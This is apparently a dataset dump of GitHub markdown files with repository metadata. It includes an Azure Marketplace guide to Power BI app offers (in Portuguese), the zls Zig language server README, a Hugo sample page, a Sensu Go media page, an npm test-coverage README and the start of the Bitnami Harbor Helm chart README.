hexsha
stringlengths 40
40
| size
int64 5
1.04M
| ext
stringclasses 6
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
344
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
11
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
344
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
11
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
344
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
11
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
1.04M
| avg_line_length
float64 1.14
851k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
| lid
stringclasses 191
values | lid_prob
float64 0.01
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
972278e093e7da3b5072c3264970fbc6572638d5 | 15,314 | md | Markdown | articles/marketplace/partner-center-portal/create-power-bi-app-offer.md | pmsousa/azure-docs.pt-pt | bc487beff48df00493484663c200e44d4b24cb18 | [
"CC-BY-4.0",
"MIT"
] | 15 | 2017-08-28T07:46:17.000Z | 2022-02-03T12:49:15.000Z | articles/marketplace/partner-center-portal/create-power-bi-app-offer.md | pmsousa/azure-docs.pt-pt | bc487beff48df00493484663c200e44d4b24cb18 | [
"CC-BY-4.0",
"MIT"
] | 407 | 2018-06-14T16:12:48.000Z | 2021-06-02T16:08:13.000Z | articles/marketplace/partner-center-portal/create-power-bi-app-offer.md | pmsousa/azure-docs.pt-pt | bc487beff48df00493484663c200e44d4b24cb18 | [
"CC-BY-4.0",
"MIT"
] | 17 | 2017-10-04T22:53:31.000Z | 2022-03-10T16:41:59.000Z | ---
title: Criar uma oferta de aplicativo Power BI no Microsoft AppSource
description: Saiba como criar e publicar uma oferta de aplicação Power BI ao Microsoft AppSource.
author: navits09
ms.author: navits
ms.service: marketplace
ms.subservice: partnercenter-marketplace-publisher
ms.topic: how-to
ms.date: 07/22/2020
ms.openlocfilehash: d5eb253fb24f463106866f8b0fe17f634e805cbb
ms.sourcegitcommit: 5f482220a6d994c33c7920f4e4d67d2a450f7f08
ms.translationtype: MT
ms.contentlocale: pt-PT
ms.lasthandoff: 04/08/2021
ms.locfileid: "107107482"
---
# <a name="create-a-power-bi-app-offer"></a>Criar uma oferta da aplicação Power BI
Este artigo descreve como criar e publicar uma oferta de aplicação Power BI ao [Microsoft AppSource.](https://appsource.microsoft.com/)
Antes de iniciar, [crie uma conta de Mercado Comercial no Partner Center](../create-account.md) se ainda não o fez. Certifique-se de que a sua conta está inscrita no programa de marketplace comercial.
## <a name="create-a-new-offer"></a>Criar uma nova oferta
1. Inscreva-se no [Partner Center](https://partner.microsoft.com/dashboard/home).
2. No menu de navegação à esquerda, selecione **Commercial Marketplace** > **Overview**.
3. Na página 'Vista Geral', selecione **+ Nova oferta** Power BI Service > **App**.

> [!NOTE]
> Após a publicação de uma oferta, as edições feitas no Partner Center só aparecem nas lojas online depois de republicarem a oferta. Certifique-se de que é sempre republicante depois de escorção.
> [!IMPORTANT]
> Se a **Power BI Service App** não for mostrada ou ativada, a sua conta não tem permissão para criar este tipo de oferta. Por favor, verifique se cumpriu todos os [requisitos](create-power-bi-app-overview.md) para este tipo de oferta, incluindo o registo de uma conta de desenvolvedor.
## <a name="new-offer"></a>Nova oferta
Introduza um **ID de oferta**. Este é um identificador único para cada oferta na sua conta.
- Este ID é visível para os clientes no endereço web para a oferta de mercado e modelos de Gestor de Recursos Azure, se aplicável.
- Utilize apenas letras minúsculas e números. Pode incluir hífens e sublinhados, mas sem espaços, e está limitado a 50 caracteres. Por exemplo, se introduzir **aqui o test-offer-1,** o endereço web da oferta será `https://azuremarketplace.microsoft.com/marketplace/../test-offer-1` .
- O ID da Oferta não pode ser alterado depois de selecionar **Criar**.
Insira **um pseudónimo de Oferta.** Este é o nome usado para a oferta no Partner Center.
- Este nome não é usado no mercado e é diferente do nome da oferta e outros valores mostrados aos clientes.
- O pseudónimo Oferta não pode ser alterado depois de selecionar **Criar**.
Selecione **Criar** para gerar a oferta e continuar.
## <a name="offer-overview"></a>Oferta geral
Esta página mostra uma representação visual dos passos necessários para publicar esta oferta (concluída e futura) e quanto tempo cada passo deve demorar a ser concluído.
Inclui links para realizar operações nesta oferta com base na seleção que faz. Por exemplo:
- Se a oferta for um rascunho - Eliminar oferta de rascunho
- Se a oferta for ao vivo - [Pare de vender a oferta](update-existing-offer.md#stop-selling-an-offer-or-plan)
- Se a oferta estiver em pré-visualização - [Go-live](../review-publish-offer.md#previewing-and-approving-your-offer)
- Se ainda não tiver concluído a assinatura do editor - [Cancele a publicação.](../review-publish-offer.md#cancel-publishing)
## <a name="offer-setup"></a>Configuração de oferta
### <a name="customer-leads"></a>Ligações ao cliente
Ao publicar a sua oferta no mercado com o Partner Center, deve conectá-la ao seu sistema de Gestão de Relacionamento com o Cliente (CRM). Isto permite-lhe receber informações de contacto do cliente assim que alguém manifestar interesse ou utilizar o seu produto.
1. Selecione um destino de oportunidades potenciais para onde quer que enviemos as oportunidades potenciais de clientes. O Partner Center suporta os seguintes sistemas crm:
- [Dinâmica 365](commercial-marketplace-lead-management-instructions-dynamics.md) para Envolvimento com o Cliente
- [Marketo](commercial-marketplace-lead-management-instructions-marketo.md)
- [Salesforce](commercial-marketplace-lead-management-instructions-salesforce.md)
> [!NOTE]
> Se o seu sistema CRM não estiver nesta lista, utilize [a Tabela Azure](commercial-marketplace-lead-management-instructions-azure-table.md) ou [o ponto final HTTPS](commercial-marketplace-lead-management-instructions-https.md) para armazenar dados de chumbo do cliente. Em seguida, exporte os dados para o seu sistema crm.
2. Ligue a sua oferta ao destino principal ao publicar no Partner Center.
3. Confirme se a ligação ao destino de chumbo está configurada corretamente. Depois de publicá-lo no Partner Center, validaremos a ligação e enviaremos um teste. Enquanto pré-visualiza a oferta antes de entrar em direto, também pode testar a sua ligação de chumbo tentando comprar a oferta no ambiente de pré-visualização.
4. Certifique-se de que a ligação ao destino principal permanece atualizada para não perder nenhuma pista.
Aqui estão alguns recursos adicionais de gestão de chumbo:
- [Oportunidades potenciais da oferta do marketplace comercial](commercial-marketplace-get-customer-leads.md)
- [Questões comuns sobre gestão de chumbo](../lead-management-faq.md#common-questions-about-lead-management)
- [Erros de configuração de chumbo de resolução de problemas](../lead-management-faq.md#publishing-config-errors)
- [Visão geral da gestão de chumbo](https://assetsprod.microsoft.com/mpn/cloud-marketplace-lead-management.pdf) PDF (Certifique-se de que o seu bloqueador pop-up está desligado).
**Selecione Guardar o projeto** antes de continuar.
## <a name="properties"></a>Propriedades
Esta página permite definir as categorias e indústrias usadas para agrupar a sua oferta no mercado, a sua versão de aplicação e os contratos legais que suportam a sua oferta.
### <a name="category"></a>Categoria
Selecione categorias e subcategorias para colocar a sua oferta nas áreas de pesquisa de mercado apropriadas. Não se esqueça de descrever como a sua oferta suporta estas categorias na descrição da oferta. Selecione:
- Pelo menos uma e até duas categorias, incluindo uma categoria primária e secundária (opcional).
- Até duas subcategorias para cada categoria primária e/ou secundária. Se não for aplicável nenhuma subcategoria à sua oferta, selecione **Não aplicável**.
Consulte a lista completa de categorias e subcategorias na [Listagem de Ofertas Boas Práticas.](../gtm-offer-listing-best-practices.md)
### <a name="industry"></a>Setor
[!INCLUDE [Industry Taxonomy](./includes/industry-taxonomy.md)]
### <a name="legal"></a>Legal
#### <a name="terms-and-conditions"></a>Termos e condições
Para fornecer os seus próprios termos e condições personalizados, insira até 10.000 caracteres na caixa **de Termos e Condições.** Os clientes devem aceitar estes termos antes de poderem experimentar a sua oferta.
**Selecione Guardar o rascunho** antes de continuar para a secção seguinte, Ofereça a listagem.
## <a name="offer-listing"></a>Listagem de ofertas
Aqui definirá os detalhes da oferta que são apresentados no mercado. Isto inclui o nome da oferta, descrição, imagens, e assim por diante.
### <a name="language"></a>Linguagem
Selecione o idioma no qual a sua oferta será listada. Atualmente, **inglês (Estados Unidos)** é a única opção disponível.
Defina detalhes do mercado (como nome de oferta, descrição e imagens) para cada idioma/mercado. Selecione o nome idioma/mercado para fornecer esta informação.
> [!NOTE]
> Os detalhes da oferta não são necessários para estar em inglês se a descrição da oferta começar com a frase: "Esta aplicação está disponível apenas em [língua não inglesa]." Também é normal fornecer um Link Útil para oferecer conteúdo num idioma diferente do usado na listagem de ofertas.
Aqui está um exemplo de como as informações de oferta aparecem no Microsoft AppSource (quaisquer preços listados são apenas para fins e não se destinam a refletir custos reais):
:::image type="content" source="media/example-power-bi-app.png" alt-text="Ilustra como esta oferta aparece no Microsoft AppSource.":::
#### <a name="call-out-descriptions"></a>Descrições de chamadas
1. Logótipo
2. Produtos
3. Categorias
4. Indústrias
5. Endereço de suporte (link)
6. Termos de utilização
7. Política de privacidade
8. Nome da oferta
9. Resumo
10. Description
11. Screenshots/vídeos
### <a name="name"></a>Name
O nome que aqui entra apresenta como título da sua oferta. Este campo está pré-preenchido com o texto que inseriu na caixa **de pseudónimos Oferta** quando criou a oferta. Pode alterar este nome posteriormente.
O nome:
- Pode ser registada (e pode incluir símbolos de marca registada ou de direitos autorais).
- Não deve ter mais de 50 caracteres.
- Não pode incluir emojis.
### <a name="search-results-summary"></a>Resumo dos resultados da pesquisa
Forneça uma breve descrição da sua oferta. Isto pode ter até 100 caracteres de comprimento e é usado em resultados de pesquisa no mercado.
### <a name="description"></a>Description
[!INCLUDE [Long description-1](./includes/long-description-1.md)]
[!INCLUDE [Long description-2](./includes/long-description-2.md)]
[!INCLUDE [Long description-3](./includes/long-description-3.md)]
### <a name="search-keywords"></a>Pesquisar palavras-chave
Introduza até três palavras-chave de pesquisa opcionais para ajudar os clientes a encontrar a sua oferta no mercado. Para obter melhores resultados, utilize também estas palavras-chave na sua descrição.
### <a name="helpprivacy-web-addresses"></a>Endereços Web de ajuda/Privacidade
Forneça links para ajudar os clientes a entender melhor a sua oferta.
#### <a name="help-link"></a>Ligação de ajuda
Insira o endereço web onde os clientes podem saber mais sobre a sua oferta.
#### <a name="privacy-policy-url"></a>URL de política de privacidade
Insira o endereço web para a política de privacidade da sua organização. Você é responsável por garantir que a sua oferta está em conformidade com as leis e regulamentos de privacidade. Você também é responsável por publicar uma política de privacidade válida no seu site.
### <a name="contact-information"></a>Informações de Contacto
Deve fornecer o nome, e-mail e número de telefone para um **contacto de suporte** e um contacto de **Engenharia.** Esta informação não é mostrada aos clientes. Está disponível para a Microsoft e pode ser fornecido aos parceiros cloud Solution Provider (CSP).
- Contacto de apoio (obrigatório): Para questões gerais de apoio.
- Contacto de engenharia (obrigatório): Para questões técnicas e questões de certificação.
- Contacto do Programa CSP (opcional): Para revendedores questões relacionadas com o programa CSP.
Na secção **de contacto de Apoio,** forneça o endereço web do **site de Apoio** onde os parceiros possam encontrar suporte para a sua oferta.
### <a name="supporting-documents"></a>Documentos comprovativos
Fornecer pelo menos um e até três documentos de marketing relacionados em formato PDF. Por exemplo, livros brancos, brochuras, listas de verificação ou apresentações.
### <a name="marketplace-images"></a>Imagens do mercado
Forneça logotipos e imagens para utilizar com a sua oferta. Todas as imagens devem estar em formato PNG. Imagens desfocadas serão rejeitadas.
[!INCLUDE [logo tips](../includes/graphics-suggestions.md)]
>[!NOTE]
>Se tiver um problema de upload de ficheiros, certifique-se de que a rede local não bloqueia o `https://upload.xboxlive.com` serviço utilizado pelo Partner Center.
#### <a name="store-logos"></a>Logotipos da loja
Forneça um ficheiro PNG para o logotipo de tamanho **grande.** O Partner Center irá usá-lo para criar um logótipo **pequeno.** Pode substituir opcionalmente isto por uma imagem diferente mais tarde.
- **Grande** (de 216 x 216 a 350 x 350 px, necessário)
- **Pequeno** (48 x 48 px, opcional)
Estes logótipos são utilizados em diferentes locais da listagem:
[!INCLUDE [logos-appsource-only](../includes/logos-appsource-only.md)]
[!INCLUDE [logo tips](../includes/graphics-suggestions.md)]
#### <a name="screenshots"></a>Capturas de ecrã
Adicione pelo menos uma e até cinco imagens que mostram como a sua oferta funciona. Cada um deve ter 1280 x 720 pixels em tamanho e em formato PNG.
#### <a name="videos-optional"></a>Vídeos (opcional)
Adicione até cinco vídeos que demonstram a sua oferta. Insira o nome do vídeo, o seu endereço web e a imagem PNG do vídeo em 1280 x 720 pixels de tamanho.
#### <a name="additional-marketplace-listing-resources"></a>Recursos de listagem de mercado adicionais
Para saber mais sobre a criação de listas de ofertas, consulte [Offer listing best practices](../gtm-offer-listing-best-practices.md).
## <a name="technical-configuration"></a>Configuração técnica
Promova a sua aplicação no Serviço Power BI para a produção e forneça a ligação de instalador de aplicações Power BI que permite aos clientes instalarem a sua aplicação. Para obter mais informações, consulte [as aplicações publicar com dashboards e relatórios no Power BI](/power-bi/service-create-distribute-apps).
## <a name="supplemental-content"></a>Conteúdo suplementar
Forneça informações adicionais sobre a sua oferta para nos ajudar a validá-la. Esta informação não é mostrada aos clientes ou publicada no mercado.
### <a name="validation-assets"></a>Ativos de validação
Opcionalmente, adicione instruções (até 3.000 caracteres) para ajudar a equipa de validação da Microsoft a configurar, conectar e testar a sua aplicação. Inclua configurações típicas, contas, parâmetros ou outras informações que possam ser usadas para testar a opção De Ligar Dados. Esta informação é visível apenas para a equipa de validação e é utilizada apenas para fins de validação.
## <a name="review-and-publish"></a>Rever e publicar
Depois de ter completado todas as secções necessárias da oferta, pode submeter a sua oferta para rever e publicar.
No canto superior direito do portal, selecione **'Rever e publicar**.
Na página de comentários pode:
- Consulte o estado de conclusão de cada secção da oferta. Não pode publicar até que todas as secções da oferta estejam marcadas como completas.
- **Não começou** - A secção ainda não foi iniciada e precisa de ser concluída.
- **Incompleto** - A secção tem erros que precisam de ser corrigidos ou requer que forneça mais informações. Consulte as secções anteriormente neste documento para obter orientação.
- **Completo** - A secção tem todos os dados necessários e não há erros. Todas as secções da oferta devem estar completas antes de poder submeter a oferta.
- Forneça instruções de teste à equipa de certificação para garantir que a sua aplicação é testada corretamente. Além disso, forneça quaisquer notas suplementares que sejam úteis para entender a sua oferta.
Para submeter a oferta de publicação, **selecione Publicar**.
Enviaremos um e-mail para informá-lo quando uma versão de pré-visualização da oferta estiver disponível para revisão e aprovação. Para publicar a sua oferta ao público, vá ao Partner Center e selecione **Go-live**.
| 58.450382 | 387 | 0.775891 | por_Latn | 0.999538 |
9722afd3e5e8fd62b8ad1b871c22106f45758a51 | 7,066 | md | Markdown | README.md | pfgithub/zls | 4952c344818a1886ea6db7992339c2ae4ac25593 | [
"MIT"
] | null | null | null | README.md | pfgithub/zls | 4952c344818a1886ea6db7992339c2ae4ac25593 | [
"MIT"
] | null | null | null | README.md | pfgithub/zls | 4952c344818a1886ea6db7992339c2ae4ac25593 | [
"MIT"
] | 1 | 2022-01-20T10:46:06.000Z | 2022-01-20T10:46:06.000Z | 


Zig Language Server, or `zls`, is a language server for Zig. The Zig wiki states that "The Zig community is decentralized" and "There is no concept of 'official' or 'unofficial'", so instead of calling `zls` unofficial, and I'm going to call it a cool option, one of [many](https://github.com/search?q=zig+language+server).
<!-- omit in toc -->
## Table Of Contents
- [Installation](#installation)
- [Build Options](#build-options)
- [Configuration Options](#configuration-options)
- [Usage](#usage)
- [VSCode](#vscode)
- [Sublime Text 3](#sublime-text-3)
- [Kate](#kate)
- [Neovim/Vim8](#neovimvim8)
- [Emacs](#emacs)
- [Related Projects](#related-projects)
- [License](#license)
## Installation
Installing `zls` is pretty simple. You will need [a build of Zig master](https://ziglang.org/download/) (or >0.6) to build ZLS.
```bash
git clone --recurse-submodules https://github.com/zigtools/zls
cd zls
zig build
# To configure ZLS:
zig build config
```
### Build Options
| Option | Type | Default Value | What it Does |
| --- | --- | --- | --- |
| `-Ddata_version` | `string` (master or 0.6.0) | 0.6.0 | The data file version. This selects the files in the `src/data` folder that correspond to the Zig version being served.
Then, you can use the `zls` executable in an editor of your choice that has a Zig language server client!
### Configuration Options
You can configure zls by providing a zls.json file.
zls will look for a zls.json configuration file in multiple locations with the following priority:
- In the folders open in your workspace (this applies for files in those folders)
- In the local configuration folder of your OS (as provided by [known-folders](https://github.com/ziglibs/known-folders#folder-list))
- In the same directory as the executable
The following options are currently available.
| Option | Type | Default value | What it Does |
| --- | --- | --- | --- |
| `enable_snippets` | `bool` | `false` | Enables snippet completions when the client also supports them. |
| `zig_lib_path` | `?[]const u8` | `null` | zig library path, e.g. `/path/to/zig/lib/zig`, used to analyze std library imports. |
| `zig_exe_path` | `?[]const u8` | `null` | zig executable path, e.g. `/path/to/zig/zig`, used to run the custom build runner. If `null`, zig is looked up in `PATH`. Will be used to infer the zig standard library path if none is provided. |
| `warn_style` | `bool` | `false` | Enables warnings for style *guideline* mismatches |
| `build_runner_path` | `?[]const u8` | `null` | Path to the build_runner.zig file provided by zls. This option must be present in one of the global configuration files to have any effect. `null` is equivalent to `${executable_directory}/build_runner.zig` |
| `enable_semantic_tokens` | `bool` | false | Enables semantic token support when the client also supports it. |
## Usage
`zls` will supercharge your Zig programming experience with autocomplete, function documentation, and more! Follow the instructions for your specific editor below:
### VSCode
Install the `zls-vscode` extension from [here](https://github.com/zigtools/zls-vscode/releases).
### Sublime Text 3
- Install the `LSP` package from [here](https://github.com/sublimelsp/LSP/releases) or via Package Control.
- Add this snippet to `LSP's` user settings:
```json
{
"clients": {
"zig":{
"command": ["zls"],
"enabled": true,
"languageId": "zig",
"scopes": ["source.zig"],
"syntaxes": ["Packages/Zig Language/Syntaxes/Zig.tmLanguage"]
}
}
}
```
### Kate
- Enable `LSP client` plugin in Kate settings.
- Add this snippet to `LSP client's` user settings (e.g. /$HOME/.config/kate/lspclient)
(or paste it in `LSP client's` GUI settings)
```json
{
"servers": {
"zig": {
"command": ["zls"],
"url": "https://github.com/zigtools/zls",
"highlightingModeRegex": "^Zig$"
}
}
}
```
### Neovim/Vim8
- Install the CoC engine from [here](https://github.com/neoclide/coc.nvim).
- Issue `:CocConfig` from within your Vim editor, and the following snippet:
```json
{
"languageserver": {
"zls" : {
"command": "command_or_path_to_zls",
"filetypes": ["zig"]
}
}
}
```
### Emacs
- Install [lsp-mode](https://github.com/emacs-lsp/lsp-mode) from melpa
- [zig mode](https://github.com/ziglang/zig-mode) is also useful
```elisp
(require 'lsp)
(add-to-list 'lsp-language-id-configuration '(zig-mode . "zig"))
(lsp-register-client
(make-lsp-client
:new-connection (lsp-stdio-connection "<path to zls>")
:major-modes '(zig-mode)
:server-id 'zls))
```
## Related Projects
- [`sublime-zig-language` by @prime31](https://github.com/prime31/sublime-zig-language)
- Supports basic language features
- Uses data provided by `src/data` to perform builtin autocompletion
- [`zig-lsp` by @xackus](https://github.com/xackus/zig-lsp)
- Inspiration for `zls`
- [`known-folders` by @ziglibs](https://github.com/ziglibs/known-folders)
- Provides API to access known folders on Linux, Windows and Mac OS
## License
MIT
| 47.422819 | 1,598 | 0.722898 | eng_Latn | 0.545459 |
9722affd0665831042c67d39b95179ff601e57d0 | 1,000 | md | Markdown | exampleSite/content/en/foo-first-level-section/foo-second-level/page-at-foo-second-level.md | marcanuy/simpleit-hugo-theme | 49277e5c3be0f90f6250d12a138cf21d32319404 | [
"MIT"
] | 17 | 2018-08-09T22:56:36.000Z | 2022-03-28T19:50:03.000Z | exampleSite/content/en/foo-first-level-section/foo-second-level/page-at-foo-second-level.md | brandonburt/breezy-centurion | 57f283657b2b3a701050cf72c6f4c87c1d03cf6c | [
"MIT"
] | 26 | 2019-02-18T21:32:30.000Z | 2021-07-22T21:01:32.000Z | exampleSite/content/en/foo-first-level-section/foo-second-level/page-at-foo-second-level.md | brandonburt/breezy-centurion | 57f283657b2b3a701050cf72c6f4c87c1d03cf6c | [
"MIT"
] | 10 | 2018-10-29T01:39:51.000Z | 2021-07-31T16:07:47.000Z | ---
title: "Page at nested section level"
linktitle: "Nested link Title"
date: "2018-08-06"
subtitle: 'I am the subtitle'
description: 'I am the description used at head meta and footer description'
resources:
- name: #header
src: #victor_hugo.jpg
title: #Portrait photograph of Victor Hugo
params:
license: #"Public Domain"
original: #"https://commons.wikimedia.org/wiki/File:Victor_Hugo_by_%C3%89tienne_Carjat_1876_-_full.jpg"
translationKey: "page-at-foo-second-level"
---
## Overview
I am an article at `/content/foo-first-level-section/foo-second-level/page-at-second-level.md`.
## Lorem ipsum dolor sit amet
Lorem ipsum dolor sit amet, eu eos vitae deseruisse eloquentiam.
Ex his nemore dolorem incorrupte, vide omnis facete pro an, cum te
summo simul.
## An veri sensibus
An veri sensibus hendrerit vim, duo omnis expetenda at, error numquam
expetendis eum ea. No cum simul iriure sensibus, consequuntur
conclusionemque cum an.
Admodum rationibus percipitur eos an.
| 28.571429 | 107 | 0.759 | eng_Latn | 0.347587 |
9722e235965773e66283ae09f6e1e375a18a4485 | 1,923 | md | Markdown | archived/sensu-go/5.11/getting-started/media.md | acsrujan/sensu-docs | 50836c29a25df06b5ab811c611b018279a48ff09 | [
"MIT"
] | 69 | 2015-01-14T20:11:56.000Z | 2022-01-24T10:44:03.000Z | archived/sensu-go/5.11/getting-started/media.md | acsrujan/sensu-docs | 50836c29a25df06b5ab811c611b018279a48ff09 | [
"MIT"
] | 2,119 | 2015-01-08T20:00:16.000Z | 2022-03-31T15:26:31.000Z | archived/sensu-go/5.11/getting-started/media.md | acsrujan/sensu-docs | 50836c29a25df06b5ab811c611b018279a48ff09 | [
"MIT"
] | 217 | 2015-01-08T09:44:23.000Z | 2022-03-24T01:52:59.000Z | ---
title: "Sensu Go media"
linkTitle: "Media"
description: "Looking for resources on Sensu Go? Check out our media guide, which includes a collection of blog posts, videos, tutorials, and podcasts, all covering Sensu Go."
version: "5.11"
weight: 100
product: "Sensu Go"
menu:
sensu-go-5.11:
parent: getting-started
---
### Talks
- [Greg Poirier - Sensu Go Deep Dive at Sensu Summit 2017](https://www.youtube.com/watch?v=mfOk0mOfkvA)
- [Greg Poirier - Sensu Go Assets](https://www.youtube.com/watch?v=JNHs4VD_-1M&t=1s)
- [Sean Porter, Influx Days - Data Collection & Prometheus Scraping with Sensu 5.0](https://www.youtube.com/watch?v=vn32Gx8rL4o)
### Blog posts
- [Simon Plourde: Understanding RBAC in Sensu Go](https://blog.sensu.io/understanding-rbac-in-sensu-go)
- [Sean Porter: Self-service monitoring checks in Sensu Go](https://blog.sensu.io/self-service-monitoring-checks-in-sensu-go)
- [Christian Michel - How to monitor 1,000 network devices using Sensu Go and Ansible](https://blog.sensu.io/network-monitoring-tools-sensu-ansible)
- [Eric Chlebek - Filters: valves for the Sensu monitoring event pipeline](https://blog.sensu.io/filters-valves-for-the-sensu-monitoring-event-pipeline)
- [Greg Schofield - Sensu Habitat Core Plans are Here](https://blog.chef.io/2018/08/22/guest-post-sensu-habitat-core-plans-are-here/)
- [Nikki Attea - Check output metric extraction with InfluxDB & Grafana](http://blog.sensu.io/check-output-metric-extraction-with-influxdb-grafana)
- [Jef Spaleta - Migrating to 5.0](https://blog.sensu.io/migrating-to-2.0-the-good-the-bad-the-ugly)
- [Anna Plotkin - Sensu Go is here!](https://blog.sensu.io/sensu-go-is-here)
### Tutorials
- [Sensu sandbox tutorials](../sandbox)
### Podcasts
- [Sensu Community Chat November 2018](https://www.youtube.com/watch?v=5tIPv-rJMZU)
_NOTE: Prior to October 2018, Sensu Go was known as Sensu 2.0._
| 49.307692 | 176 | 0.730109 | eng_Latn | 0.245937 |
972333b739f5dd0f822568fd0afece425de7c7d3 | 842 | md | Markdown | README.md | zKillboard/zkb-backup | a9ecdd10b18712a3e2a3f384f3ceca552a52fe32 | [
"MIT"
] | null | null | null | README.md | zKillboard/zkb-backup | a9ecdd10b18712a3e2a3f384f3ceca552a52fe32 | [
"MIT"
] | null | null | null | README.md | zKillboard/zkb-backup | a9ecdd10b18712a3e2a3f384f3ceca552a52fe32 | [
"MIT"
] | 1 | 2021-08-12T05:25:48.000Z | 2021-08-12T05:25:48.000Z | # zkb-backup
Creates a sqlite backup of killmails known by zkillboard.
# Requirements
Requires curl and sqlite3 php extensions.
# Install
Clone this repository and chdir into it.
Install composer if you don't already have it. Instructions can be found at https://getcomposer.org/download/
Execute:
./composer.phar update
chdir into the cron directory and execute go.php:
php go.php
If all is well, you'll see output including the fetcher grabbing individual killmails, the redisq listener, as well as the daily fetcher pulling the killmail_id and hashes. The data is stored under `/data/` of the installed directory.
## Cron
Add this entry to your cronjob, replacing the `~` with the appropriate location:
~/zkb-backup/cron/cron.sh
That's it. You're done. It will take time to fetch all killmails, be patient.
| 27.16129 | 234 | 0.756532 | eng_Latn | 0.996934 |
97238f9a50f0d208c797fad77d71e8c894f22c17 | 4,376 | md | Markdown | README.md | npmtest/node-npmtest-hippie | 843ef5a4a192384c86550430c46ae79e9301554a | [
"MIT"
] | null | null | null | README.md | npmtest/node-npmtest-hippie | 843ef5a4a192384c86550430c46ae79e9301554a | [
"MIT"
] | null | null | null | README.md | npmtest/node-npmtest-hippie | 843ef5a4a192384c86550430c46ae79e9301554a | [
"MIT"
] | null | null | null | # npmtest-hippie
#### basic test coverage for [hippie (v0.5.1)](https://github.com/vesln/hippie) [](https://www.npmjs.org/package/npmtest-hippie) [](https://travis-ci.org/npmtest/node-npmtest-hippie)
#### Simple end-to-end API testing
[](https://www.npmjs.com/package/hippie)
| git-branch : | [alpha](https://github.com/npmtest/node-npmtest-hippie/tree/alpha)|
|--:|:--|
| coverage : | [](https://npmtest.github.io/node-npmtest-hippie/build/coverage.html/index.html)|
| test-report : | [](https://npmtest.github.io/node-npmtest-hippie/build/test-report.html)|
| test-server-github : | [](https://npmtest.github.io/node-npmtest-hippie/build/app/index.html) | | build-artifacts : | [](https://github.com/npmtest/node-npmtest-hippie/tree/gh-pages/build)|
- [https://npmtest.github.io/node-npmtest-hippie/build/coverage.html/index.html](https://npmtest.github.io/node-npmtest-hippie/build/coverage.html/index.html)
[](https://npmtest.github.io/node-npmtest-hippie/build/coverage.html/index.html)
- [https://npmtest.github.io/node-npmtest-hippie/build/test-report.html](https://npmtest.github.io/node-npmtest-hippie/build/test-report.html)
[](https://npmtest.github.io/node-npmtest-hippie/build/test-report.html)
- [https://npmdoc.github.io/node-npmdoc-hippie/build/apidoc.html](https://npmdoc.github.io/node-npmdoc-hippie/build/apidoc.html)
[](https://npmdoc.github.io/node-npmdoc-hippie/build/apidoc.html)


# package.json
```json
{
"author": {
"name": "Veselin Todorov"
},
"bugs": {
"url": "https://github.com/vesln/hippie/issues"
},
"dependencies": {
"assertion-error": "~1.0.0",
"deep-eql": "~0.1.3",
"es6-promise": "^3.0.2",
"pathval": "0.0.1",
"qs": "~0.6.5",
"request": "~2.74.0"
},
"description": "Simple end-to-end API testing",
"devDependencies": {
"chai": "~1.8.1",
"express": "~3.4.4",
"hydro": "~0.8.7",
"hydro-bdd": "~0.1.0",
"hydro-chai": "~0.1.3",
"hydro-clean-stacks": "~0.1.0",
"hydro-dot": "~1.0.5",
"istanbul": "~0.1.44",
"jshint": "~2.3.0"
},
"directories": {},
"dist": {
"shasum": "050db4f3b6ee8daa8029abeba6b51e58b6cf1526",
"tarball": "https://registry.npmjs.org/hippie/-/hippie-0.5.1.tgz"
},
"gitHead": "376c7e0985c599162e9f47ba7a33d1bfaa644760",
"homepage": "https://github.com/vesln/hippie",
"license": "MIT",
"main": "./lib/hippie.js",
"maintainers": [
{
"name": "cachecontrol"
},
{
"name": "veselin"
},
{
"name": "vesln"
}
],
"name": "hippie",
"optionalDependencies": {},
"repository": {
"type": "git",
"url": "git+https://github.com/vesln/hippie.git"
},
"scripts": {
"coverage": "istanbul cover _hydro",
"pretest": "jshint .",
"test": "hydro"
},
"version": "0.5.1",
"bin": {}
}
```
# misc
- this document was created with [utility2](https://github.com/kaizhu256/node-utility2)
| 42.076923 | 380 | 0.653793 | yue_Hant | 0.143217 |
9723a20c3b68d4ddccd57eb286b42a7214935e4e | 337,710 | md | Markdown | bitnami/harbor/README.md | angel7slayer/charts | 5b159a70ec71d4a59280be1cdb8091660502e51e | [
"Apache-2.0"
] | null | null | null | bitnami/harbor/README.md | angel7slayer/charts | 5b159a70ec71d4a59280be1cdb8091660502e51e | [
"Apache-2.0"
] | null | null | null | bitnami/harbor/README.md | angel7slayer/charts | 5b159a70ec71d4a59280be1cdb8091660502e51e | [
"Apache-2.0"
] | null | null | null | <!--- app-name: Harbor -->
# Harbor packaged by Bitnami
Harbor is an open source trusted cloud-native registry to store, sign, and scan content. It adds functionalities like security, identity, and management to the open source Docker distribution.
[Overview of Harbor](https://goharbor.io/)
## TL;DR
```bash
helm repo add bitnami https://charts.bitnami.com/bitnami
helm install my-release bitnami/harbor
```
## Introduction
This [Helm](https://github.com/kubernetes/helm) chart installs [Harbor](https://github.com/goharbor/harbor) in a Kubernetes cluster. Welcome to [contribute](https://github.com/bitnami/charts/blob/master/CONTRIBUTING.md) to Helm Chart for Harbor.
This Helm chart has been developed based on [goharbor/harbor-helm](https://github.com/goharbor/harbor-helm) chart but including some features common to the Bitnami chart library.
For example, the following changes have been introduced:
- Possibility to pull all the required images from a private registry through the Global Docker image parameters.
- Redis™ and PostgreSQL are managed as chart dependencies.
- Liveness and Readiness probes for all deployments are exposed to the values.yaml.
